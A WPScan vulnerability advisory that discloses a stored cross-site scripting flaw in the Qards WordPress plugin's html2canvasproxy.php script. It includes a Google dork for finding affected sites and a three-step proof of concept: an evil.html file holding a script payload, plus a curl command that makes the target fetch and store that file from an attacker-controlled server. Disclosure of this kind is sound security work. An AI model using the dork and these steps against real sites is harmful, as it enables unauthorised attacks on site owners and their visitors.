Qards - Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Google Dork: inurl:"plugins/qards"

Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as following:

<hash md5>.<mime-type>

On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file, suffer from a persistent XSS vulnerability.

POC:
1. create a remote file (evil.html), on your webserver, with the following content:

<script> alert('XSS'); </script>

2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'

3. Browse to http://target/wp-content/plugins/qards/images/ to get the file

Affects Plugin

References

URL https://designmodo.com/qards/
URL https://www.youtube.com/watch?v=RRt_PUUnVhg
URL https://github.com/brcontainer/html2canvas-php-proxy/issues/27

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter theMiddle
Submitter Twitter https://twitter.com/Menin_TheMiddle
Views 147
Verified No
WPVDB ID 8934

Timeline

Publicly Published 2017-10-11 (about 1 month ago)
Added 2017-10-17 (about 1 month ago)
Last Updated 2017-10-17 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.